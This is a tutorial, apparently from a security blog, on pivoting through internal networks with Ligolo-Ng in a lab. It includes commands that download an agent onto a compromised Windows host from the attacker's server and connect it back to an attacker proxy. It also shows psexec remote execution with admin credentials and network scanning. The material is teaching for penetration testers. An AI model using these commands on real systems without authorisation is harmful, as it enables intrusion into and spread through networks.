This comprehensive guide delves into the intricacies of Lateral Movement utilizing Ligolo-Ng, a tool developed by Nicolas Chatelain. The Ligolo-Ng tool facilitates the establishment of tunnels through reverse TCP/TLS connections using a tun interface, avoiding the necessity of SOCKS. This guide covers various aspects, from the tool's unique features to practical applications such as single and double pivoting within a network.
Download
Ligolo-Ng:
Ligolo-Ng can be
downloaded from the official repository: Ligolo-Ng
Releases.
Table
of Contents:
1.
Introduction to Ligolo-Ng
2.
Ligolo V/S Chisel
3.
Lab Setup
4.
Prerequisites
5.
Setting up Ligolo-Ng
6.
Single Pivoting
7.
Double Pivoting
Ligolo-Ng
Overview:
Ligolo-Ng is a lightweight and efficient
tool designed to enable penetration testers to establish tunnels through
reverse TCP/TLS connections, employing a tun interface. Noteworthy features
include its GO-coded nature, VPN-like behavior, customizable proxy, and agents
in GO. The tool supports multiple protocols, including ICMP, UDP, SYN stealth
scans, OS detection, and DNS Resolution, offering connection speeds of up to
100 Mbits/sec. Ligolo-Ng minimizes maintenance time by avoiding tool residue on
disk or in memory.
Ligolo
V/S Chisel:
- Ligolo-Ng outperforms Chisel in terms of speed and
customization options.
- Chisel operates on a server-client model, while Ligolo-Ng
establishes individual connections with each target.
- Ligolo-Ng reduces maintenance time by avoiding tool residue on
disk or in memory.
- Ligolo-Ng supports various protocols, including ICMP, UDP, SYN,
in contrast to Chisel, which operates primarily on HTTP using a websocket.
Lab Setup
Follow the step-by-step guide for lateral movement within a network,
covering both single and double pivoting techniques.
Prerequisites
Obtain the Ligolo 'agent' file for Windows 64-bit and the 'proxy' file
for Linux 64-bit.
Install the 'agent' file on the target machine and the 'proxy' file on
the attacking machine (Kali Linux).
Setting up Ligolo-Ng
Step1: Following the
acquisition of both the agent and proxy files, the next step involves the setup
of Ligolo-Ng. To ascertain the current status of Ligolo-Ng configuration, the
'ifconfig' command is employed. To initiate activation, execute the prescribed
sequence of commands as follows:
ip tuntap add user root mode tun ligolo
ip link set ligolo up
Verify Ligolo-Ng activation with: ‘ifconfig’ command
Step2: Unzip the Ligolo
proxy file:
tar -xvzf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz
This proxy file facilitates the establishment of a connection through
Ligolo, enabling us to execute subsequent pivoting actions. To explore the full
range of options available in the proxy file, utilize the 'help' command
./proxy -h
Step 3: The options
displayed in the preceding image are designed for incorporating various types
of certificates with the proxy. The chosen approach involves utilizing the
'-selfcert' option, which operates on port 11601. Execute the provided command,
as illustrated in the accompanying image below:
./proxy -selfcert
Step 4: By executing
the aforementioned command, Ligolo-Ng becomes operational on the attacking
machine. Subsequently, to install the Ligolo agent on the target machine, unzip
the ligolo agent file using the command:
unzip ligolo-ng_agent_0.5.1_windows_amd64.zip
To facilitate the transmission of this agent file to the target,
establish a server with the command:
updog -p 80
Step 5: In the context
of lateral movement, a session has been successfully acquired through netcat.
Utilizing the established netcat connection, the next step involves downloading
the Ligolo agent file onto the target system. Referencing the image below,
execute the provided sequence of commands:
cd Desktop
powershell wget 192.168.1.5/agent.exe -o agent.exe
dir
Step 6: Evidently, the
agent file has been successfully downloaded. Given that the proxy file is
presently operational on Kali, the subsequent action involves executing the
agent file.
./agent.exe -connect 192.168.1.5:11601 -ignore-cert
Upon executing the specified command, a Ligolo session is initiated.
Subsequently, employ the 'session' command, opting for '1' to access the active
session. Following the session establishment, execute the 'ifconfig' command as
illustrated in the provided image.
Notably, it discloses the existence of an internal network on the
server, denoted by the IPv4 Address 192.168.148.130/24. This discovery prompts
further exploration into creating a tunnel through this internal network in the
subsequent steps.
Single Pivoting
In the single pivoting scenario, the aim is to access Network B while
staying within the boundaries of Network
A.
Attempting a direct ping to Network B reveals, as illustrated in the
image below, the impossibility due to different network configuration.
To progress towards the single pivoting objective, a new terminal window
will be opened. Subsequently, the internal IP will be added to the IP route,
and the addition will be confirmed, as illustrated in the image below,
utilizing the following commands:
ip route add 192.168.148.0/24 dev ligolo
ip route list
Return to the Ligolo proxy session window and initiate the tunneling
process by entering the 'start' command, as demonstrated in the provided image.
Upon establishing a tunnel into network B, we executed the netexec
command to scan the network B subnet, unveiling an additional Windows 10 entity
distinct from DC1, as depicted in the image.
Upon attempting to ping the IP now, successful ping responses will be
observed, a contrast to the previous unsuccessful attempts. Additionally, a
comprehensive nmap scan can be conducted, as illustrated in the image below.
Double Pivoting
In the process of double pivoting, our objective is to gain access to
Network C from Network A, utilizing Network B as an intermediary.
From the newly opened terminal window, utilize the Impacket tool to
access the identified Windows 10 with the IP 192.168.148.132. Following this,
execute the subsequent set of commands to download the Ligolo agent onto
Windows 10
Impacket-psexec administrator:123@192.168.148.132
cd c:\users\public
powershell wget 192.168.1.5/agent.exe -o agent.exe
dir
Subsequently, initiate the execution of the agent.exe. Upon completion,
a session will be established, given that our Ligolo proxy file is already
operational.
agent.exe -connect 192.168.1.5:11601 -ignore-cert
Examine Ligo-ng proxy server, a new session, corresponding to Windows
10, will be present, as indicated in the accompanying image. Execute the
'start' command to initiate additional tunneling.
Execute the 'session' command to display the list of sessions. Navigate
through the sessions using arrow keys, selecting the desired session for
access. In this instance, the aim is to access the latest session, identified
as session 2. Select this session and utilize the 'ifconfig' command to inspect
the interfaces. This action reveals an additional network C interface
with the address 192.168.159.130/24, mirroring the details depicted in
the image below.
Upon identifying the new network, the initial step involves attempting a
ping. However, the image below indicates an absence of connectivity between Kali
and the network C.
Add the Network C Subnet in the IP route list with the following
command.
ip route add 192.168.159.0/24 dev ligolo
ip route list
With the modification of our IP route, the next step involves the
addition of a listener to traverse the intra-network and retrieve the session.
To incorporate the listener, utilize the following command:
listener_add --addr 0.0.0.0:1234 --to 127.0.0.1:4444
The image above confirms the activation of the listener. To initiate
tunneling, refer to available options using the help command. It becomes
evident that halting the ongoing tunneling in session 1 is necessary before
starting the process in session 2. This step-by-step approach facilitates the
transfer of data to the listener, which subsequently retrieves the necessary
information. This operational technique, known as double pivoting, involves
stopping the initial tunneling in the first session using the 'stop'
command. In second session, execute the 'start' command,
following the steps illustrated in the image below.
Executing double pivoting was successful, and its verification occurred
through the utilization of crackmapexec with the command:
crackmapexec smb 192.168.159.0/24
Discovering Metasploitable2 within the network followed. This led to the
ability to conduct a ping and nmap scan, leveraging the acquired network
access, as illustrated in the image below:
0 comments:
Post a Comment